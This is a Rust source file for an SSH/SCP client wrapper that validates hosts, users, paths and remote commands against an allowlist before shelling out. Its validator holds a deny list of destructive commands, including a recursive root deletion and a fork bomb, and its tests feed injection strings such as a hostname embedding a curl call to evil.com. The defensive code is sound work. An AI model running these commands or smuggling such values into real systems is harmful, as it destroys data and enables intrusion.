use crate::core::error::{Error, Result};
use blueprint_core::{debug, info, warn};
use blueprint_std::path::{Path, PathBuf};
use shell_escape::escape;
use tokio::process::Command;
/// Parameters describing how to reach a remote host over SSH.
///
/// Instances are normally built with [`SecureSshConnection::new`] and the
/// `with_*` builder methods, which validate their inputs. The fields are
/// public, so assigning to them directly bypasses that validation.
#[derive(Debug, Clone)]
pub struct SecureSshConnection {
/// Remote host name or address; checked by `validate_hostname` in `new`.
pub host: String,
/// TCP port of the SSH server; `new` sets it to 22.
pub port: u16,
/// Login name on the remote host; checked by `validate_username` in `new`.
pub user: String,
/// Optional private key file passed to ssh/scp with `-i`.
pub key_path: Option<PathBuf>,
/// Optional jump host passed to ssh with `-J`.
pub jump_host: Option<String>,
/// Optional known-hosts file, used only when strict host checking is on.
pub known_hosts_file: Option<PathBuf>,
/// Whether `StrictHostKeyChecking=yes` is requested; `new` sets it to `true`.
pub strict_host_checking: bool,
}
impl SecureSshConnection {
/// Creates a connection description for `user@host` with conservative defaults.
///
/// Defaults: port 22, no key file, no jump host, no custom known-hosts file,
/// and strict host key checking enabled.
///
/// # Errors
/// Returns `Error::ConfigurationError` when `host` fails hostname validation
/// or `user` fails username validation (the host is checked first).
pub fn new(host: String, user: String) -> Result<Self> {
    Self::validate_hostname(&host)?;
    Self::validate_username(&user)?;

    let connection = Self {
        strict_host_checking: true,
        known_hosts_file: None,
        jump_host: None,
        key_path: None,
        port: 22,
        user,
        host,
    };
    Ok(connection)
}
pub fn with_port(mut self, port: u16) -> Result<Self> {
if port == 0 {
return Err(Error::ConfigurationError(format!(
"Invalid SSH port: {port}"
)));
}
self.port = port;
Ok(self)
}
pub fn with_key_path<P: AsRef<Path>>(mut self, key_path: P) -> Result<Self> {
let path = key_path.as_ref();
Self::validate_key_path(path)?;
self.key_path = Some(path.to_path_buf());
Ok(self)
}
/// Sets the jump host used to reach the target.
///
/// The value is checked with the same rules as the primary host name.
///
/// # Errors
/// Returns the hostname validation error when `jump_host` is rejected.
pub fn with_jump_host(mut self, jump_host: String) -> Result<Self> {
    match Self::validate_hostname(&jump_host) {
        Ok(()) => {
            self.jump_host = Some(jump_host);
            Ok(self)
        }
        Err(reason) => Err(reason),
    }
}
/// Sets the known-hosts file used for host key verification.
///
/// A missing file only produces a warning; the path is stored regardless,
/// so this method currently always returns `Ok`.
pub fn with_known_hosts<P: AsRef<Path>>(mut self, known_hosts: P) -> Result<Self> {
    let file = known_hosts.as_ref().to_path_buf();
    if !file.exists() {
        warn!("Known hosts file does not exist: {}", file.display());
    }
    self.known_hosts_file = Some(file);
    Ok(self)
}
/// Enables or disables strict host key checking.
///
/// Turning it off logs a security warning, because the remote host's
/// identity is then no longer verified.
pub fn with_strict_host_checking(mut self, strict: bool) -> Self {
    self.strict_host_checking = strict;
    if !self.strict_host_checking {
        warn!("SECURITY WARNING: Disabling strict host key checking - MITM attacks possible!");
    }
    self
}
fn validate_hostname(host: &str) -> Result<()> {
if host.is_empty() || host.len() > 253 {
return Err(Error::ConfigurationError("Invalid hostname length".into()));
}
let dangerous_chars = [
';', '&', '|', '`', '$', '(', ')', '{', '}', '<', '>', '"', '\'', '\\',
];
if host.chars().any(|c| dangerous_chars.contains(&c)) {
return Err(Error::ConfigurationError(format!(
"Hostname contains dangerous characters: {host}"
)));
}
if !host
.chars()
.all(|c| c.is_ascii_alphanumeric() || "-._".contains(c))
{
return Err(Error::ConfigurationError(format!(
"Invalid hostname format: {host}"
)));
}
Ok(())
}
/// Checks that `user` is safe to use as the login name in `user@host`.
///
/// Accepts 1 to 32 bytes consisting only of ASCII letters, digits, `-` and
/// `_`, and additionally requires that the name does not start with `-`.
///
/// The user name is the first thing in the `user@host` argument the command
/// builders in this file emit, so a leading `-` would make ssh/scp parse
/// that whole argument as command-line options instead of a destination.
///
/// # Errors
/// Returns `Error::ConfigurationError` describing the first rule violated.
fn validate_username(user: &str) -> Result<()> {
    if user.is_empty() || user.len() > 32 {
        return Err(Error::ConfigurationError("Invalid username length".into()));
    }
    let dangerous_chars = [
        ';', '&', '|', '`', '$', '(', ')', '{', '}', '<', '>', '"', '\'', '\\',
    ];
    if user.chars().any(|c| dangerous_chars.contains(&c)) {
        return Err(Error::ConfigurationError(format!(
            "Username contains dangerous characters: {user}"
        )));
    }
    if !user
        .chars()
        .all(|c| c.is_ascii_alphanumeric() || "-_".contains(c))
    {
        return Err(Error::ConfigurationError(format!(
            "Invalid username format: {user}"
        )));
    }
    // Checked last so every previously reported error keeps its message.
    if user.starts_with('-') {
        return Err(Error::ConfigurationError(format!(
            "Username must not start with '-': {user}"
        )));
    }
    Ok(())
}
/// Checks that `path` is an acceptable SSH private key location.
///
/// The path must be valid UTF-8, must not contain a parent-directory (`..`)
/// component or the substrings `../` / `..\`, and must exist. On Unix, a key
/// readable or writable by group/others only triggers a warning.
///
/// # Errors
/// Returns `Error::ConfigurationError` for non-UTF-8 paths, path traversal,
/// a missing file, or (on Unix) unreadable metadata.
fn validate_key_path(path: &Path) -> Result<()> {
    let path_str = path
        .to_str()
        .ok_or_else(|| Error::ConfigurationError("Invalid UTF-8 in key path".into()))?;
    // The substring checks alone miss a bare `..` or a trailing `dir/..`,
    // so the parsed components are inspected as well.
    let has_parent_component = path.components().any(|part| part.as_os_str() == "..");
    if has_parent_component || path_str.contains("../") || path_str.contains("..\\") {
        return Err(Error::ConfigurationError(
            "Path traversal detected in key path".into(),
        ));
    }
    if !path.exists() {
        return Err(Error::ConfigurationError(format!(
            "SSH key file does not exist: {}",
            path.display()
        )));
    }
    #[cfg(unix)]
    {
        use std::os::unix::fs::PermissionsExt;
        let metadata = path.metadata().map_err(|e| {
            Error::ConfigurationError(format!("Cannot read key file metadata: {e}"))
        })?;
        // The raw mode may carry file-type bits as well; keep only the
        // permission bits so the logged value reads like `644`.
        let perms = metadata.permissions().mode() & 0o7777;
        if perms & 0o077 != 0 {
            warn!(
                "SSH key file has overly permissive permissions: {:o}",
                perms
            );
        }
    }
    Ok(())
}
}
/// Client that runs remote commands and copies files by invoking the
/// system `ssh` and `scp` programs with the wrapped connection settings.
#[derive(Clone)]
pub struct SecureSshClient {
// Connection parameters used to build every ssh/scp command line.
connection: SecureSshConnection,
}
impl SecureSshClient {
pub fn new(connection: SecureSshConnection) -> Self {
Self { connection }
}
pub async fn run_remote_command(&self, command: &str) -> Result<String> {
self.validate_command(command)?;
let ssh_cmd = self.build_secure_ssh_command(command)?;
debug!("Executing SSH command: {}", ssh_cmd);
let output = Command::new("sh")
.arg("-c")
.arg(&ssh_cmd)
.output()
.await
.map_err(|e| Error::ConfigurationError(format!("SSH command failed: {e}")))?;
if !output.status.success() {
let stderr = String::from_utf8_lossy(&output.stderr);
return Err(Error::ConfigurationError(format!(
"Remote command failed: {stderr}"
)));
}
Ok(String::from_utf8_lossy(&output.stdout).to_string())
}
/// Assembles the shell command line that runs `command` over ssh.
///
/// The result is a single string meant for `sh -c`: fixed `-o` options,
/// then the port (only when it is not 22), key file, jump host,
/// `user@host`, and finally the remote command. Paths, jump host, user,
/// host and command are each passed through `shell_escape::escape`.
///
/// # Errors
/// Returns `Error::ConfigurationError` when the known-hosts path or the
/// key path is not valid UTF-8.
fn build_secure_ssh_command(&self, command: &str) -> Result<String> {
    let conn = &self.connection;
    // Collected as separate tokens and joined with single spaces at the end.
    let mut tokens: Vec<String> = vec!["ssh".to_string()];

    if !conn.strict_host_checking {
        warn!("Using insecure SSH configuration - MITM attacks possible!");
        tokens.push("-o StrictHostKeyChecking=no".to_string());
        tokens.push("-o UserKnownHostsFile=/dev/null".to_string());
    } else {
        tokens.push("-o StrictHostKeyChecking=yes".to_string());
        if let Some(known_hosts) = conn.known_hosts_file.as_ref() {
            let known_hosts_str = known_hosts.to_str().ok_or_else(|| {
                Error::ConfigurationError("Known hosts path contains invalid UTF-8".to_string())
            })?;
            tokens.push(format!(
                "-o UserKnownHostsFile={}",
                escape(known_hosts_str.into())
            ));
        }
    }

    let fixed_options = [
        "-o ConnectTimeout=30",
        "-o ServerAliveInterval=60",
        "-o ServerAliveCountMax=3",
        "-o BatchMode=yes",
    ];
    tokens.extend(fixed_options.iter().map(|option| option.to_string()));

    if conn.port != 22 {
        tokens.push(format!("-p {}", conn.port));
    }

    if let Some(key_path) = conn.key_path.as_ref() {
        let key_path_str = key_path.to_str().ok_or_else(|| {
            Error::ConfigurationError("SSH key path contains invalid UTF-8".to_string())
        })?;
        tokens.push(format!("-i {}", escape(key_path_str.into())));
    }

    if let Some(jump_host) = conn.jump_host.as_deref() {
        tokens.push(format!("-J {}", escape(jump_host.into())));
    }

    tokens.push(format!(
        "{}@{}",
        escape(conn.user.as_str().into()),
        escape(conn.host.as_str().into())
    ));
    tokens.push(escape(command.into()).to_string());

    Ok(tokens.join(" "))
}
/// Allowlist consulted by `validate_command` for every non-empty,
/// non-comment line of a remote command.
///
/// Most entries end with a space; `whoami` does not.
///
/// NOTE(review): `validate_command` trims each line and skips lines that
/// begin with `#` before consulting this list, so the `"#"` and `"\n"`
/// entries look unreachable from that caller - confirm before removing.
const ALLOWED_CMD_PREFIXES: &'static [&'static str] = &[
"echo ",
"docker ",
"podman ",
"ctr ",
"sudo ",
"mkdir ",
"chmod ",
"systemctl ",
"apt-get ",
"curl ",
"nginx ",
"cat ",
"tee ",
"install ",
"test ",
"ls ",
"cp ",
"mv ",
"rm ",
"tar ",
"sysctl ",
"journalctl ",
"grep ",
"head ",
"tail ",
"stat ",
"uname ",
"whoami",
"id ",
"ip ",
"#", "\n", ];
/// Validates a remote command before it is sent over ssh.
///
/// Checks, in order:
/// 1. the command is not empty or whitespace-only, is at most 8192 bytes,
///    and contains no NUL byte;
/// 2. for every non-empty line that is not a `#` comment, the first
///    whitespace-delimited word equals one of the program names in
///    `ALLOWED_CMD_PREFIXES` (entries compared without trailing spaces);
/// 3. the command contains none of a small set of destructive patterns.
///
/// Comparing the whole first word, rather than a string prefix, accepts an
/// allowlisted program invoked without arguments (`ls`, `id`) and rejects
/// words that merely start with an allowlisted name (`whoamiXYZ`).
///
/// This is a coarse filter only: it does not parse shell syntax, so text
/// after the first word of a line is not inspected beyond step 3.
///
/// # Errors
/// Returns `Error::ConfigurationError` naming the first failed check.
fn validate_command(&self, command: &str) -> Result<()> {
    let trimmed = command.trim();
    if trimmed.is_empty() {
        return Err(Error::ConfigurationError(
            "Empty command not allowed".into(),
        ));
    }
    if command.len() > 8192 {
        return Err(Error::ConfigurationError("Command too long".into()));
    }
    if command.contains('\0') {
        return Err(Error::ConfigurationError(
            "Command contains null bytes".into(),
        ));
    }
    for line in trimmed.lines() {
        let line = line.trim();
        if line.is_empty() || line.starts_with('#') {
            continue;
        }
        // `line` is non-empty after trimming, so a first word always exists;
        // the fallback only keeps this expression total.
        let program = line.split_whitespace().next().unwrap_or(line);
        let allowed = Self::ALLOWED_CMD_PREFIXES
            .iter()
            .map(|entry| entry.trim_end())
            .any(|name| !name.is_empty() && name == program);
        if !allowed {
            return Err(Error::ConfigurationError(format!(
                "Command not in allowlist: {}",
                line.chars().take(80).collect::<String>()
            )));
        }
    }
    let dangerous_patterns = [
        "rm -rf /",
        ":(){ :|:& };:",
        "dd if=/dev/zero",
        "mkfs.",
        "fdisk",
        "parted",
    ];
    for pattern in &dangerous_patterns {
        if command.contains(pattern) {
            return Err(Error::ConfigurationError(format!(
                "Dangerous command pattern detected: {pattern}"
            )));
        }
    }
    Ok(())
}
pub async fn copy_files(&self, local_path: &Path, remote_path: &str) -> Result<()> {
self.validate_local_path(local_path)?;
self.validate_remote_path(remote_path)?;
let scp_cmd = self.build_secure_scp_command(local_path, remote_path)?;
info!(
"Copying files via SCP: {} -> {}",
local_path.display(),
remote_path
);
let output = Command::new("sh")
.arg("-c")
.arg(&scp_cmd)
.output()
.await
.map_err(|e| Error::ConfigurationError(format!("SCP failed: {e}")))?;
if !output.status.success() {
let stderr = String::from_utf8_lossy(&output.stderr);
return Err(Error::ConfigurationError(format!(
"File copy failed: {stderr}"
)));
}
info!("Files copied successfully");
Ok(())
}
/// Assembles the shell command line that copies `local_path` to
/// `remote_path` with scp.
///
/// The result is a single string meant for `sh -c`: host-key options,
/// timeout/keep-alive/batch options, the port (`-P`, only when it is not
/// 22), key file, the local path, and `user@host:remote_path`. Paths, user
/// and host are each passed through `shell_escape::escape`.
///
/// The timeout, keep-alive and `BatchMode=yes` options use the same values
/// as `build_secure_ssh_command`, so a copy fails instead of waiting on a
/// password prompt or an unreachable host.
///
/// # Errors
/// Returns `Error::ConfigurationError` when the known-hosts path, key path
/// or local path is not valid UTF-8.
fn build_secure_scp_command(&self, local_path: &Path, remote_path: &str) -> Result<String> {
    let mut scp_cmd = String::from("scp");
    if self.connection.strict_host_checking {
        scp_cmd.push_str(" -o StrictHostKeyChecking=yes");
        if let Some(ref known_hosts) = self.connection.known_hosts_file {
            let known_hosts_str = known_hosts.to_str().ok_or_else(|| {
                Error::ConfigurationError("Known hosts path contains invalid UTF-8".to_string())
            })?;
            scp_cmd.push_str(&format!(
                " -o UserKnownHostsFile={}",
                escape(known_hosts_str.into())
            ));
        }
    } else {
        warn!("Using insecure SCP configuration");
        scp_cmd.push_str(" -o StrictHostKeyChecking=no");
        scp_cmd.push_str(" -o UserKnownHostsFile=/dev/null");
    }
    // Keep scp non-interactive and bounded, matching the ssh command line.
    scp_cmd.push_str(" -o ConnectTimeout=30");
    scp_cmd.push_str(" -o ServerAliveInterval=60");
    scp_cmd.push_str(" -o ServerAliveCountMax=3");
    scp_cmd.push_str(" -o BatchMode=yes");
    if self.connection.port != 22 {
        // scp takes the port as upper-case `-P`.
        scp_cmd.push_str(&format!(" -P {}", self.connection.port));
    }
    if let Some(ref key_path) = self.connection.key_path {
        let key_path_str = key_path.to_str().ok_or_else(|| {
            Error::ConfigurationError("SSH key path contains invalid UTF-8".to_string())
        })?;
        let escaped_path = escape(key_path_str.into());
        scp_cmd.push_str(&format!(" -i {escaped_path}"));
    }
    let local_path_str = local_path.to_str().ok_or_else(|| {
        Error::ConfigurationError("Local path contains invalid UTF-8".to_string())
    })?;
    let escaped_local = escape(local_path_str.into());
    let escaped_user = escape(self.connection.user.as_str().into());
    let escaped_host = escape(self.connection.host.as_str().into());
    let escaped_remote = escape(remote_path.into());
    scp_cmd.push_str(&format!(
        " {escaped_local} {escaped_user}@{escaped_host}:{escaped_remote}"
    ));
    Ok(scp_cmd)
}
/// Checks that `path` is an acceptable local source for a copy.
///
/// The path must exist, be valid UTF-8, and must not contain a
/// parent-directory (`..`) component or the substrings `../` / `..\`.
///
/// # Errors
/// Returns `Error::ConfigurationError` for a missing file, a non-UTF-8
/// path, or detected path traversal.
fn validate_local_path(&self, path: &Path) -> Result<()> {
    if !path.exists() {
        return Err(Error::ConfigurationError(format!(
            "Local file does not exist: {}",
            path.display()
        )));
    }
    let path_str = path
        .to_str()
        .ok_or_else(|| Error::ConfigurationError("Invalid UTF-8 in local path".into()))?;
    // The substring checks alone miss a bare `..` or a trailing `dir/..`,
    // so the parsed components are inspected as well.
    let has_parent_component = path.components().any(|part| part.as_os_str() == "..");
    if has_parent_component || path_str.contains("../") || path_str.contains("..\\") {
        return Err(Error::ConfigurationError(
            "Path traversal detected in local path".into(),
        ));
    }
    Ok(())
}
/// Checks that `path` is safe to use as the remote side of an scp target.
///
/// The path must be non-empty, at most 4096 bytes, and free of shell
/// metacharacters (including both quote characters) and control characters
/// such as newline, carriage return and NUL.
///
/// Local escaping in the scp command builder only protects the local
/// `sh -c`; depending on the scp transfer mode the remote side may hand the
/// path to a shell again, where a quote or newline could alter the command.
///
/// # Errors
/// Returns `Error::ConfigurationError` naming the first rule violated.
fn validate_remote_path(&self, path: &str) -> Result<()> {
    if path.is_empty() {
        return Err(Error::ConfigurationError("Empty remote path".into()));
    }
    if path.len() > 4096 {
        return Err(Error::ConfigurationError("Remote path too long".into()));
    }
    let dangerous_chars = [
        ';', '&', '|', '`', '$', '(', ')', '{', '}', '<', '>', '"', '\'', '\\',
    ];
    if path
        .chars()
        .any(|c| dangerous_chars.contains(&c) || c.is_control())
    {
        return Err(Error::ConfigurationError(format!(
            "Remote path contains dangerous characters: {path}"
        )));
    }
    Ok(())
}
}
#[cfg(test)]
mod tests {
    use super::*;

    /// A valid host/user pair is stored as given with strict checking on;
    /// shell metacharacters in either value are rejected.
    #[test]
    fn test_secure_ssh_connection_validation() {
        let conn = SecureSshConnection::new("example.com".to_string(), "user".to_string()).unwrap();
        assert_eq!(conn.host, "example.com");
        assert_eq!(conn.user, "user");
        assert!(conn.strict_host_checking);

        let rejected_pairs = [("host; rm -rf /", "user"), ("example.com", "user; id")];
        for (host, user) in rejected_pairs.iter() {
            let outcome = SecureSshConnection::new(host.to_string(), user.to_string());
            assert!(outcome.is_err());
        }
    }

    /// An allowlisted command passes; destructive or empty commands fail.
    #[test]
    fn test_command_validation() {
        let conn = SecureSshConnection::new("example.com".to_string(), "user".to_string()).unwrap();
        let client = SecureSshClient::new(conn);

        assert!(client.validate_command("ls -la").is_ok());

        let rejected_commands = ["rm -rf /", ":(){ :|:& };:", ""];
        for command in rejected_commands.iter() {
            assert!(client.validate_command(command).is_err());
        }
    }

    /// Plain host names and dotted addresses pass; injection attempts and
    /// the empty string fail.
    #[test]
    fn test_hostname_validation() {
        let accepted = ["example.com", "192.168.1.1"];
        let rejected = ["host; rm -rf /", "host$(curl evil.com)", ""];

        assert!(accepted
            .iter()
            .all(|host| SecureSshConnection::validate_hostname(host).is_ok()));
        assert!(rejected
            .iter()
            .all(|host| SecureSshConnection::validate_hostname(host).is_err()));
    }
}